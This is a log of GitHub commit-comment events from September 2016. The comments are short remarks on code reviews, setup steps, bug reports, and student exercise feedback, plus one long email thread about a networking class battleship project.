{"id":"4581085139","type":"CommitCommentEvent","actor":{"login":"wallisonalves"},"repo":{"name":"wallisonalves/remastersys"},"payload":{"comment":{"id":19073136,"position":null,"line":null,"path":null,"commit_id":"7b51112767fa9bf135f2c7e19df2f4f91affe4fd","created_at":"2016-09-19T02:11:37Z","updated_at":"2016-09-19T02:11:37Z","body":"operator"}},"created_at":"2016-09-19T02:11:37Z"}
{"id":"4581085552","type":"CommitCommentEvent","actor":{"login":"shapiro2"},"repo":{"name":"eulerto/pg_similarity"},"payload":{"comment":{"id":19073137,"position":null,"line":null,"path":null,"commit_id":"be1a8b08c8716e59b89982557da9ea68cdf868c5","created_at":"2016-09-19T02:11:51Z","updated_at":"2016-09-19T02:11:51Z","body":"OK. I just scanned the file, but you know the logic. Just making sure."}},"created_at":"2016-09-19T02:11:51Z"}
{"id":"4581086160","type":"CommitCommentEvent","actor":{"login":"hajirahlove"},"repo":{"name":"hajirahlove/letsgo2"},"payload":{"comment":{"id":19073139,"position":null,"line":null,"path":null,"commit_id":"4110cf5b867dd6e38ba94dda474acc27d6686863","created_at":"2016-09-19T02:12:12Z","updated_at":"2016-09-19T02:12:12Z","body":"echo \"# hello-world\" >> README.md\r\ngit init\r\ngit add README.md\r\ngit commit -m \"first commit\"\r\ngit remote add origin https://github.com/hajirahlove/hello-world.git\r\ngit push -u origin master\r\n"}},"created_at":"2016-09-19T02:12:12Z"}
{"id":"4581090427","type":"CommitCommentEvent","actor":{"login":"CaioWzy"},"repo":{"name":"CaioWzy/Paper-1.7"},"payload":{"comment":{"id":19073147,"position":null,"line":null,"path":null,"commit_id":"aefbc5b14bc16c4b0143572d8ad523b1184db44e","created_at":"2016-09-19T02:14:27Z","updated_at":"2016-09-19T02:14:27Z","body":"This patch is the same as [this commit by @md-5](https://hub.spigotmc.org/stash/projects/SPIGOT/repos/spigot/commits/21fe7077d9140e0f9db01587a39c2ffec29e3ec8)."}},"created_at":"2016-09-19T02:14:27Z"}
{"id":"4581091444","type":"CommitCommentEvent","actor":{"login":"karthiksbhat"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":19073152,"position":49,"line":61,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"907475ed899f7f6a5bb29ac69929fb56f9645739","created_at":"2016-09-19T02:15:00Z","updated_at":"2016-09-19T02:15:00Z","body":"I have not removed comments in this file because I will be making modifications to them later, and I wanted to keep the commented-out code for reference.\r\nThey will be removed in a later commit."}},"created_at":"2016-09-19T02:15:00Z"}
{"id":"4581092557","type":"CommitCommentEvent","actor":{"login":"devvmh"},"repo":{"name":"mina-deploy/mina"},"payload":{"comment":{"id":19073153,"position":23,"line":81,"path":"tasks/mina/deploy.rb","commit_id":"8abd7d5ea5ed069b98df08f3cff8f2f43f31f54e","created_at":"2016-09-19T02:15:35Z","updated_at":"2016-09-19T02:15:35Z","body":"🎉 "}},"created_at":"2016-09-19T02:15:35Z"}
{"id":"4581093791","type":"CommitCommentEvent","actor":{"login":"rikyuusima"},"repo":{"name":"TNCT-SYSKEN/Neurnect"},"payload":{"comment":{"id":19073155,"position":11,"line":11,"path":"Neurnect-server/views/js/app.js","commit_id":"9c4d2e13fe941af85d01f70dd47acbf688d30393","created_at":"2016-09-19T02:16:14Z","updated_at":"2016-09-19T02:16:14Z","body":".text()は確かinnerHTMLを表示させるものでは？\r\n.val()が使えた気がします…"}},"created_at":"2016-09-19T02:16:14Z"}
{"id":"4581099262","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"rjs2015/dsp"},"payload":{"comment":{"id":19073160,"position":null,"line":null,"path":null,"commit_id":"005fb80afde71443558968104dd42ccab23d79a0","created_at":"2016-09-19T02:19:15Z","updated_at":"2016-09-19T02:19:15Z","body":"Hi RJ,\r\nVery good work on these exercises 👍, you crushed it. Nice error catching in your code.  A nice one-liner for the sort_last exercise that uses a lambda: \r\n    s=sorted(tuples,key=lambda t: t[1] )\r\n\r\nI should have advanced python finished by the end of the week. See you in class Wednesday!\r\n\r\n"}},"created_at":"2016-09-19T02:19:15Z"}
{"id":"4581101399","type":"CommitCommentEvent","actor":{"login":"enlite93"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19073161,"position":null,"line":null,"path":null,"commit_id":"2bbb5557979f7ca03deec635c445a5e0864e065b","created_at":"2016-09-19T02:20:21Z","updated_at":"2016-09-19T02:20:21Z","body":"Ahh broke my script! \r\n\r\nThanks anyway, makes more sense. :+1: "}},"created_at":"2016-09-19T02:20:21Z"}
{"id":"4581102692","type":"CommitCommentEvent","actor":{"login":"Henry30"},"repo":{"name":"Henry30/MaterialDesing"},"payload":{"comment":{"id":19073163,"position":null,"line":null,"path":null,"commit_id":"e52aaee3dd74d44fe2bd7ce3eb8208b7e4d82ccd","created_at":"2016-09-19T02:21:07Z","updated_at":"2016-09-19T02:21:07Z","body":"![logo](https://cloud.githubusercontent.com/assets/17391733/18621227/c810c9e4-7de5-11e6-80f7-4c9cbb6259e1.png)\r\n"}},"created_at":"2016-09-19T02:21:07Z"}
{"id":"4581104767","type":"CommitCommentEvent","actor":{"login":"Henry30"},"repo":{"name":"Henry30/MaterialDesing"},"payload":{"comment":{"id":19073166,"position":null,"line":null,"path":null,"commit_id":"e52aaee3dd74d44fe2bd7ce3eb8208b7e4d82ccd","created_at":"2016-09-19T02:22:15Z","updated_at":"2016-09-19T02:22:15Z","body":"Pantalla"}},"created_at":"2016-09-19T02:22:15Z"}
{"id":"4581105071","type":"CommitCommentEvent","actor":{"login":"hnlx2017"},"repo":{"name":"hnlx2017/weibo"},"payload":{"comment":{"id":19073167,"position":null,"line":null,"path":null,"commit_id":"0925fa6ce19878ddf2877e3148c569f85943082b","created_at":"2016-09-19T02:22:26Z","updated_at":"2016-09-19T02:22:26Z","body":"已经修复"}},"created_at":"2016-09-19T02:22:26Z"}
{"id":"4581106170","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"JonathanToro/dsp"},"payload":{"comment":{"id":19073168,"position":null,"line":null,"path":null,"commit_id":"f4cff7cb9001d77249b463689a90e73caa07eda0","created_at":"2016-09-19T02:23:06Z","updated_at":"2016-09-19T02:23:06Z","body":"Hi Johnathan, \r\nVery good work on these exercises 👍, you crushed it. Nice error catching in your code. I should have advanced python finished by the end of the week. See you in class Wednesday!"}},"created_at":"2016-09-19T02:23:06Z"}
{"id":"4581106403","type":"CommitCommentEvent","actor":{"login":"Ericson2314"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":19073169,"position":null,"line":null,"path":null,"commit_id":"22d6e31fc6a9de2ee424984e629ccd2e394ba512","created_at":"2016-09-19T02:23:14Z","updated_at":"2016-09-19T02:23:14Z","body":"How does this work regarding hashing? I'm further excited as I hope the same could be reused for self-references with the intentional store."}},"created_at":"2016-09-19T02:23:14Z"}
{"id":"4581109911","type":"CommitCommentEvent","actor":{"login":"aslakknutsen"},"repo":{"name":"arquillian/arquillian-cube-q"},"payload":{"comment":{"id":19073175,"position":170,"line":170,"path":"README.adoc","commit_id":"bd0b41f8437e7cd8d1cf865207e6b6526ae576ff","created_at":"2016-09-19T02:25:10Z","updated_at":"2016-09-19T02:25:10Z","body":"Wrong URL"}},"created_at":"2016-09-19T02:25:10Z"}
{"id":"4581112033","type":"CommitCommentEvent","actor":{"login":"cuitoldfish"},"repo":{"name":"arduino/Arduino"},"payload":{"comment":{"id":19073180,"position":23,"line":496,"path":"hardware/arduino/avr/cores/arduino/USBCore.cpp","commit_id":"2c5dd2029807a7d3fe76ed86a81643db088b5c2c","created_at":"2016-09-19T02:26:22Z","updated_at":"2016-09-19T02:26:22Z","body":"hello, why there are two device descriptor for only one device --- if the wLength is 8 then USB_DeviceDescriptorB  otherwise USB_DeviceDescriptor? \r\nand, according to **USB Interface Association Descriptor Device Class Code and Use Model**in July23, 2003, if Interface Association Descriptor is used, then the device class code must be 0xEF, but in USB_DeviceDescriptor the code is 0x00."}},"created_at":"2016-09-19T02:26:22Z"}
{"id":"4581112793","type":"CommitCommentEvent","actor":{"login":"vfreex"},"repo":{"name":"procszoo/procszoo"},"payload":{"comment":{"id":19073183,"position":null,"line":null,"path":null,"commit_id":"b25fbf08a7d1488a1bc3098f7f9187a0382bf164","created_at":"2016-09-19T02:26:47Z","updated_at":"2016-09-19T02:26:47Z","body":"@xning I'm planing to call it \"Procslink\". What do you think?"}},"created_at":"2016-09-19T02:26:47Z"}
{"id":"4581115131","type":"CommitCommentEvent","actor":{"login":"frsfx"},"repo":{"name":"trustedanalytics/cf-templates"},"payload":{"comment":{"id":19073189,"position":null,"line":null,"path":null,"commit_id":"aff75c68b7dee17edb6b763513f9780597424769","created_at":"2016-09-19T02:28:03Z","updated_at":"2016-09-19T02:28:03Z","body":"Hello. I've been trying to get the cloudformation to work for a while.  I followed the instructions and ran the template but everytime i get a timeout error on the last wait condition.  Is there a newer template I can use or can you provide some more details. Thank you! "}},"created_at":"2016-09-19T02:28:03Z"}
{"id":"4581115980","type":"CommitCommentEvent","actor":{"login":"vfreex"},"repo":{"name":"procszoo/procszoo"},"payload":{"comment":{"id":19073191,"position":null,"line":null,"path":null,"commit_id":"b25fbf08a7d1488a1bc3098f7f9187a0382bf164","created_at":"2016-09-19T02:28:30Z","updated_at":"2016-09-19T02:28:30Z","body":"@xning Note that the code under ipc/ is formal code, while zookeeper/ is only a demo"}},"created_at":"2016-09-19T02:28:30Z"}
{"id":"4581116058","type":"CommitCommentEvent","actor":{"login":"zb1006801184"},"repo":{"name":"zb1006801184/ZhuBiaoSuperProject"},"payload":{"comment":{"id":19073192,"position":null,"line":null,"path":null,"commit_id":"74e8d2c7bc2884b53ceb35058e431e3dd3b0385b","created_at":"2016-09-19T02:28:33Z","updated_at":"2016-09-19T02:28:33Z","body":"123"}},"created_at":"2016-09-19T02:28:33Z"}
{"id":"4581116775","type":"CommitCommentEvent","actor":{"login":"cqliulei"},"repo":{"name":"cqliulei/github-myblog"},"payload":{"comment":{"id":19073194,"position":null,"line":null,"path":null,"commit_id":"3c18ca1add7159513f2ab8a8a7185c1327a85212","created_at":"2016-09-19T02:28:56Z","updated_at":"2016-09-19T02:28:56Z","body":"+# cqliulei.github.io\r\n+This is my blog "}},"created_at":"2016-09-19T02:28:56Z"}
{"id":"4581118198","type":"CommitCommentEvent","actor":{"login":"AlionSSS"},"repo":{"name":"AlionSSS/Android"},"payload":{"comment":{"id":19073196,"position":2,"line":2,"path":"README.md","commit_id":"f005a82eb3182909fedfd78a63d6f8dc4892e32d","created_at":"2016-09-19T02:29:46Z","updated_at":"2016-09-19T02:29:46Z","body":"1"}},"created_at":"2016-09-19T02:29:46Z"}
{"id":"4581121135","type":"CommitCommentEvent","actor":{"login":"Emmanuel-Armstrong"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19073200,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-19T02:31:17Z","updated_at":"2016-09-19T02:31:17Z","body":"added a short POST command for the firing from the client.  If one of you\ncould look at it and see how close it is to being right that would be\ncool.  I think it makes sense but I haven't looked at HTTP as much as you\nguys lol\n\nOn Sun, Sep 18, 2016 at 7:14 PM, Emmanuel Armstrong <\nemmanuelrarmstrong@gmail.com> wrote:\n\n> Working on the read and update_board() methods now.  Doing some reading up\n> on the docs for http to make sure I fully understand the best way to\n> receive the coords and get the right responses\n>\n> On Sun, Sep 18, 2016 at 3:08 PM, dssquared <notifications@github.com>\n> wrote:\n>\n>> I don't think we will be able to use the socket library for http, I am\n>> looking at a few http libraries but need learn how to use them,\n>> experimenting now. Someone else can start working on the board maintenance\n>> like read_board() or update_board() in the server.py. These methods will\n>> receive a string or chars of x,y coords, read_board() can return a string\n>> or char for hit miss or sunk to be passed to another method.\n>>\n>>\n>> On Sun, Sep 18, 2016 at 2:26 PM, David Schwehr <dpschwehr@gmail.com>\n>> wrote:\n>>\n>> > I got some syntax errors fixed in server.py and it will run, but with\n>> the\n>> > while(1) infinite loop you have to go into the task manager to kill the\n>> > process since you have to run it from the command line to send in\n>> > arguments. We wont have to worry about it once the client stuff is more\n>> > complete to where the client will close the connection and the server\n>> wont\n>> > get stuck in a loop.\n>> >\n>> >\n>> > On Sun, Sep 18, 2016 at 2:23 PM, David Schwehr <dpschwehr@gmail.com>\n>> > wrote:\n>> >\n>> >> I got the file reading to the 2d array working.......kinda. There is an\n>> >> additional element on each row of the array to hold the new line char.\n>> This\n>> >> was the easiest without having to read a line from the text file,\n>> strip the\n>> >> /n, then change the string into chars, then put it in the array. Maybe\n>> >> later use the numpy library to make this nicer? I just wanted to get it\n>> >> working so we can move on and get more done. I left the variable for\n>> the\n>> >> width at 10 so we can still use this to check for a shot out of bounds.\n>> >>\n>> >> On Sun, Sep 18, 2016 at 1:28 PM, David Schwehr <dpschwehr@gmail.com>\n>> >> wrote:\n>> >>\n>> >>> I got reading the file and filling the array to work but I can't omitt\n>> >>> the newline character. Supossedly there is a strip('/n') that should\n>> work\n>> >>> with reading a file line by line but we need to read char by char. If\n>> you\n>> >>> were able to leave out the /n than that is farther than I got.\n>> >>>\n>> >>> On Sun, Sep 18, 2016 at 1:24 PM, Emmanuel-Armstrong <\n>> >>> notifications@github.com> wrote:\n>> >>>\n>> >>>> Oh crap I just realized, I've done some work on the file reading and\n>> >>>> writing but I totally forgot to push it up to git! I'll see if I have\n>> >>>> any\n>> >>>> more than you and if so I'll push up what I have when I get home from\n>> >>>> work\n>> >>>> in a couple hours. Sorry about that!\n>> >>>>\n>> >>>>\n>> >>>> On Sep 18, 2016 12:53 PM, \"dssquared\" <notifications@github.com>\n>> wrote:\n>> >>>>\n>> >>>> > I've started working with reading in the board file and filling the\n>> >>>> array,\n>> >>>> > about half success now. Once the board array is filled we can start\n>> >>>> working\n>> >>>> > on the rest. Not sure if we want to make a nother text file for the\n>> >>>> client\n>> >>>> > to keep track of the board since the client is re-invoked each\n>> time.\n>> >>>> Can't\n>> >>>> > really use an array since the program is restarted each time but\n>> >>>> writing to\n>> >>>> > a file from an array could be a pain. I will finish the server side\n>> >>>> > creating the board array first, might use a list within a list.\n>> >>>> > What do you guys want to work on or feel comfortable about working\n>> on?\n>> >>>> >\n>> >>>> > David\n>> >>>> >\n>> >>>> > On Sat, Sep 17, 2016 at 6:35 PM, David Schwehr <\n>> dpschwehr@gmail.com>\n>> >>>> > wrote:\n>> >>>> >\n>> >>>> > > Just checked, the address for localhost is correct, the port\n>> >>>> numbers and\n>> >>>> > > ip being set from command line arguments is already implemented\n>> and\n>> >>>> I\n>> >>>> > > checked the connection already. I was going to play around with\n>> >>>> different\n>> >>>> > > ways of making the board and http stuff next. I put a board.txt\n>> >>>> file in\n>> >>>> > the\n>> >>>> > > folder too to use to test reading the file and creating an array\n>> or\n>> >>>> list\n>> >>>> > of\n>> >>>> > > lists for the board.\n>> >>>> > > Remember to git pull before working on anything to make sure you\n>> >>>> have the\n>> >>>> > > most recent version.\n>> >>>> > > I will be working on it some tonight and spending most the day\n>> on it\n>> >>>> > > tomorrow.\n>> >>>> > >\n>> >>>> > > On Sat, Sep 17, 2016 at 6:30 PM, David Schwehr <\n>> dpschwehr@gmail.com\n>> >>>> >\n>> >>>> > > wrote:\n>> >>>> > >\n>> >>>> > >> Right now the server is on 127.0.0.1( i may have the address\n>> wrong\n>> >>>> but\n>> >>>> > it\n>> >>>> > >> should be the address of localhost, which is the same no matter\n>> >>>> what\n>> >>>> > >> machine it is running on) just to run it on your local machine\n>> to\n>> >>>> test,\n>> >>>> > it\n>> >>>> > >> will be changed to the ip address of the machine it is running\n>> on\n>> >>>> when\n>> >>>> > they\n>> >>>> > >> grade it.\n>> >>>> > >>\n>> >>>> > >> On Sat, Sep 17, 2016 at 6:26 PM, David Schwehr <\n>> >>>> dpschwehr@gmail.com>\n>> >>>> > >> wrote:\n>> >>>> > >>\n>> >>>> > >>> It is getting the fire commands from the command line\n>> arguments,\n>> >>>> that\n>> >>>> > is\n>> >>>> > >>> why the client is being invoked every play. The connection is\n>> made\n>> >>>> > with the\n>> >>>> > >>> port number and IP address passed in from the command line\n>> >>>> arguments. I\n>> >>>> > >>> have already wrote the code for the connection using the socket\n>> >>>> > library.\n>> >>>> > >>> Thev ariables for the x and y coords passed from the command\n>> line\n>> >>>> are\n>> >>>> > >>> working just as you had them in your test.py, I added it to the\n>> >>>> > client.py\n>> >>>> > >>> file already. These variable will be used in the methods that\n>> >>>> send the\n>> >>>> > http\n>> >>>> > >>> message. The http and passing in the variable I think will be\n>> the\n>> >>>> easy\n>> >>>> > >>> part, some of it is done and it works. The time consuming part\n>> is\n>> >>>> > going to\n>> >>>> > >>> be writing the code to maintain the board and \"serving\" the\n>> >>>> display of\n>> >>>> > the\n>> >>>> > >>> board.\n>> >>>> > >>> Tracking sunk ships will work as you suggested and this will be\n>> >>>> put in\n>> >>>> > a\n>> >>>> > >>> method called from read_board or process_reply or done inside\n>> of\n>> >>>> > >>> process_reply.\n>> >>>> > >>>\n>> >>>> > >>> On Sat, Sep 17, 2016 at 6:10 PM, tyler-sassaman <\n>> >>>> > >>> notifications@github.com> wrote:\n>> >>>> > >>>\n>> >>>> > >>>> I was thinking about tracking sunk ships. Just a thought, but\n>> >>>> what if\n>> >>>> > >>>> we had a global variable for each ship (carrier = 5), and\n>> every\n>> >>>> time\n>> >>>> > we hit\n>> >>>> > >>>> that type of ship we decrement that value, and compare it to\n>> 0.\n>> >>>> so if\n>> >>>> > >>>> carrier gets to 0 then it has been hit 5 times which is the\n>> same\n>> >>>> > thing as\n>> >>>> > >>>> being sunk.\n>> >>>> > >>>>\n>> >>>> > >>>> —\n>> >>>> > >>>> You are receiving this because you authored the thread.\n>> >>>> > >>>> Reply to this email directly, view it on GitHub\n>> >>>> > >>>> <https://github.com/dssquared/Networks_Lab1/commit/\n>> >>>> > 7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19068085>,\n>> >>>> > >>>> or mute the thread\n>> >>>> > >>>> <https://github.com/notifications/unsubscribe-auth/AE8DG_y6g\n>> >>>> kDXIV5_\n>> >>>> > YwVT263okb39zDjcks5qrIFygaJpZM4J_dYG>\n>> >>>> > >>>> .\n>> >>>> > >>>>\n>> >>>> > >>>\n>> >>>> > >>>\n>> >>>> > >>\n>> >>>> > >\n>> >>>> >\n>> >>>> > —\n>> >>>> > You are receiving this because you commented.\n>> >>>> > Reply to this email directly, view it on GitHub\n>> >>>> > <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1b\n>> >>>> a8a89d303ffa5a927903a77492af920#commitcomment-19071806>,\n>> >>>> > or mute the thread\n>> >>>> > <https://github.com/notifications/unsubscribe-auth/ANiCOS9eO\n>> >>>> _caF6oZivfhC4W6aceQXCnFks5qrYi_gaJpZM4J_dYG>\n>> >>>>\n>> >>>> > .\n>> >>>> >\n>> >>>>\n>> >>>> —\n>> >>>> You are receiving this because you authored the thread.\n>> >>>> Reply to this email directly, view it on GitHub\n>> >>>> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1b\n>> a8a89d303ffa5a927903a77492af920#commitcomment-19071958>,\n>> >>>> or mute the thread\n>> >>>> <https://github.com/notifications/unsubscribe-auth/AE8DG5F6y\n>> cythOV16iTCINZqZXSNnY3Fks5qrZAFgaJpZM4J_dYG>\n>> >>>> .\n>> >>>>\n>> >>>\n>> >>>\n>> >>\n>> >\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19072275>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ANiCOcgGOv7D1uxZO5mlvcDpj0kmG9ODks5qragygaJpZM4J_dYG>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-19T02:31:17Z"}
{"id":"4581121604","type":"CommitCommentEvent","actor":{"login":"shubhiD"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19073203,"position":30,"line":182,"path":"geocodertest.py","commit_id":"e58dc8da454668cce1ca10311328d366afacb01b","created_at":"2016-09-19T02:31:34Z","updated_at":"2016-09-19T02:31:34Z","body":"What I feel is this exception is thrown if the place don't have photos, still they might have place id"}},"created_at":"2016-09-19T02:31:34Z"}
{"id":"4581122455","type":"CommitCommentEvent","actor":{"login":"ethanbanker2428"},"repo":{"name":"Tesla-M-Devices/device_oneplus_oneplus3"},"payload":{"comment":{"id":19073206,"position":null,"line":null,"path":null,"commit_id":"70943eac906b49b5181495bebf0f927e35b65ab7","created_at":"2016-09-19T02:32:03Z","updated_at":"2016-09-19T02:32:03Z","body":"hey @Martinusbe im trying to figure out this cam issue with n so im gonna build tesla to test but it doesnt even get 4 minutes in for me... you seen this before? http://hastebin.com/kifubupeso.pas"}},"created_at":"2016-09-19T02:32:03Z"}
{"id":"4581122743","type":"CommitCommentEvent","actor":{"login":"qkrwnsrb0359"},"repo":{"name":"5TeamProject/5TeamProject"},"payload":{"comment":{"id":19073207,"position":null,"line":null,"path":null,"commit_id":"9cbae762b320401a59fc240a8d7c0fbbf5a417c4","created_at":"2016-09-19T02:32:12Z","updated_at":"2016-09-19T02:32:12Z","body":"와~~~~~~~~"}},"created_at":"2016-09-19T02:32:12Z"}
{"id":"4581123678","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"rshap91/dsp"},"payload":{"comment":{"id":19073209,"position":null,"line":null,"path":null,"commit_id":"afc21ccc72fdd1d7bf800d29b9dba46eb10e2597","created_at":"2016-09-19T02:32:41Z","updated_at":"2016-09-19T02:32:41Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @rshap91 \r\n\r\nNice work on the Python problems! Here are some comments:\r\n- Q2: There is no concept of order for Python sets. Checking membership in a set is much faster than in a list, because set elements are hashable. On the other hand a list is better if you have to step through each element of the list, one by one.\r\n- Q6: for `front_back(a, b)`, don't forget `from math import ceil`.\r\n- Q7, `front_x(words)`: You assume that all the strings in `words` only contain alphabetical characters, but this is not guaranteed. Thus, if I apply your function to the list `['xa','ax','-a']`, I obtain `['-a', 'xa', 'ax']`, which is incorrect.\r\n- Q8: The aim here was to find the team with the smallest difference between goals for and against it. The answer is Aston_Villa, for which the difference is 1. You should have taken the absolute value of the difference :)\r\n\r\n👍 "}},"created_at":"2016-09-19T02:32:41Z"}
{"id":"4581125239","type":"CommitCommentEvent","actor":{"login":"Henry30"},"repo":{"name":"Henry30/MaterialDesing"},"payload":{"comment":{"id":19073235,"position":null,"line":null,"path":null,"commit_id":"e52aaee3dd74d44fe2bd7ce3eb8208b7e4d82ccd","created_at":"2016-09-19T02:33:34Z","updated_at":"2016-09-19T02:33:34Z","body":"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<resources>\r\n    <color name=\"colorPrimary\">#00BCD4</color>\r\n    <color name=\"colorPrimaryDark\">#0097A7</color>\r\n    <color name=\"colorAccent\">#795548</color>\r\n</resources>\r\n"}},"created_at":"2016-09-19T02:33:34Z"}
{"id":"4581126752","type":"CommitCommentEvent","actor":{"login":"jatinsharma60"},"repo":{"name":"aaronbond/SwipeDeck2"},"payload":{"comment":{"id":19073237,"position":null,"line":null,"path":null,"commit_id":"b181ec333fe1db9041fb0f00f70a3d74489f19b8","created_at":"2016-09-19T02:34:27Z","updated_at":"2016-09-19T02:34:27Z","body":"Hi Sir,\r\n\r\nI am getting below error how could i resolve this.\r\n\r\nFATAL EXCEPTION: main\r\n                                                                                  Process: farmers.collection.com.milkcollect, PID: 2884\r\n                                                                                  java.lang.NullPointerException: Attempt to invoke virtual method 'void android.view.View.setLayerType(int, android.graphics.Paint)' on a null object reference\r\n                                                                                      at com.daprlabs.cardstack.SwipeDeck.addNextCard(SwipeDeck.java:215)\r\n                                                                                      at com.daprlabs.cardstack.SwipeDeck.onLayout(SwipeDeck.java:175)\r\n                                                                                      at android.view.View.layout(View.java:16630)\r\n                                                                                      at android.view.ViewGroup.layout(ViewGroup.java:5437)\r\n                                                                                      at android.widget.FrameLayout.layoutChildren(FrameLayout.java:336)\r\n                                                                                      at android.widget.FrameLayout.onLayout(FrameLayout.java:273)\r\n                                                                                      at android.view.View.layout(View.java:16630)\r\n                                                                                      at android.view.ViewGroup.layout(ViewGroup.java:5437)\r\n                                                                                      at android.widget.FrameLayout.layoutChildren(FrameLayout.java:336)\r\n                                                                                      at android.widget.FrameLayout.onLayout(FrameLayout.java:273)\r\n                                                                                      at android.view.View.layout(View.java:16630)\r\n                                                                                      at android.view.ViewGroup.layout(ViewGroup.java:5437)\r\n                                                                                      at android.widget.LinearLayout.setChildFrame(LinearLayout.java:1743)\r\n                                                                                      at android.widget.LinearLayout.layoutVertical(LinearLayout.java:1586)\r\n                                                                                      at android.widget.LinearLayout.onLayout(LinearLayout.java:1495)\r\n                                                                                      at android.view.View.layout(View.java:16630)\r\n                                                                                      at android.view.ViewGroup.layout(ViewGroup.java:5437)\r\n                                                                                      at android.widget.FrameLayout.layoutChildren(FrameLayout.java:336)\r\n                                                                                      at android.widget.FrameLayout.onLayout(FrameLayout.java:273)\r\n                                                                                      at com.android.internal.policy.PhoneWindow$DecorView.onLayout(PhoneWindow.java:2678)\r\n                                                                                      at android.view.View.layout(View.java:16630)\r\n                                                                                      at android.view.ViewGroup.layout(ViewGroup.java:5437)\r\n                                                                                      at android.view.ViewRootImpl.performLayout(ViewRootImpl.java:2171)\r\n                                                                                      at android.view.ViewRootImpl.performTraversals(ViewRootImpl.java:1931)\r\n                                                                                      at android.view.ViewRootImpl.doTraversal(ViewRootImpl.java:1107)\r\n                                                                                      at android.view.ViewRootImpl$TraversalRunnable.run(ViewRootImpl.java:6013)\r\n                                                                                      at android.view.Choreographer$CallbackRecord.run(Choreographer.java:858)\r\n                                                                                      at android.view.Choreographer.doCallbacks(Choreographer.java:670)\r\n                                                                                      at android.view.Choreographer.doFrame(Choreographer.java:606)\r\n                                                                                      at android.view.Choreographer$FrameDisplayEventReceiver.run(Choreographer.java:844)\r\n                                                                                      at android.os.Handler.handleCallback(Handler.java:739)\r\n                                                                                      at android.os.Handler.dispatchMessage(Handler.java:95)\r\n                                                                                      at android.os.Looper.loop(Looper.java:148)\r\n                                                                                      at android.app.ActivityThread.main(ActivityThread.java:5417)\r\n                                                                                      at java.lang.reflect.Method.invoke(Native Method)\r\n                                                                                      at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)\r\n                                                                                      at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)"}},"created_at":"2016-09-19T02:34:27Z"}
{"id":"4581130720","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073245,"position":4,"line":28,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslClientBootstrap.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T02:36:42Z","updated_at":"2016-09-19T02:36:42Z","body":"No need for breaking line here."}},"created_at":"2016-09-19T02:36:42Z"}
{"id":"4581131572","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073248,"position":4,"line":28,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslClientBootstrap.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T02:37:13Z","updated_at":"2016-09-19T02:37:13Z","body":"No need for breaking line here."}},"created_at":"2016-09-19T02:37:13Z"}
{"id":"4581132104","type":"CommitCommentEvent","actor":{"login":"d87335903"},"repo":{"name":"d87335903/Awesome-Java-RAD"},"payload":{"comment":{"id":19073254,"position":null,"line":null,"path":null,"commit_id":"f6dd95316465b5b585420aa2454964f41368f256","created_at":"2016-09-19T02:37:30Z","updated_at":"2016-09-19T02:37:30Z","body":"more relevent information,please refer to http://halyph.com/blog/2015/04/06/java-full-stack-web-framework"}},"created_at":"2016-09-19T02:37:30Z"}
{"id":"4581133329","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073260,"position":15,"line":1449,"path":"docs/configuration.md","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T02:38:11Z","updated_at":"2016-09-19T02:38:11Z","body":"Please point out the valid value as well. :)"}},"created_at":"2016-09-19T02:38:11Z"}
{"id":"4581133867","type":"CommitCommentEvent","actor":{"login":"ethanbanker2428"},"repo":{"name":"Tesla-M-Devices/device_oneplus_oneplus3"},"payload":{"comment":{"id":19073263,"position":null,"line":null,"path":null,"commit_id":"70943eac906b49b5181495bebf0f927e35b65ab7","created_at":"2016-09-19T02:38:29Z","updated_at":"2016-09-19T02:38:29Z","body":"also i havent tested but i was getting fcing on gallery this may fix it https://github.com/Hydra-OS/device_oneplus_oneplus3/commit/80e6708326139f41ea3d823bf7671b01ba4b39b5 the sdcardfs part.i  had it on my m rom when it was enabled"}},"created_at":"2016-09-19T02:38:29Z"}
{"id":"4581134134","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"ChR2/dsp"},"payload":{"comment":{"id":19073264,"position":null,"line":null,"path":null,"commit_id":"06dd5e566a0bd03fdc8655e2c9dbb5dadeaf8102","created_at":"2016-09-19T02:38:40Z","updated_at":"2016-09-19T02:38:40Z","body":"Hey Wendy,\r\nNice Work with the linear algebra exercises 👍. Pls review 2.4 & 3.1"}},"created_at":"2016-09-19T02:38:40Z"}
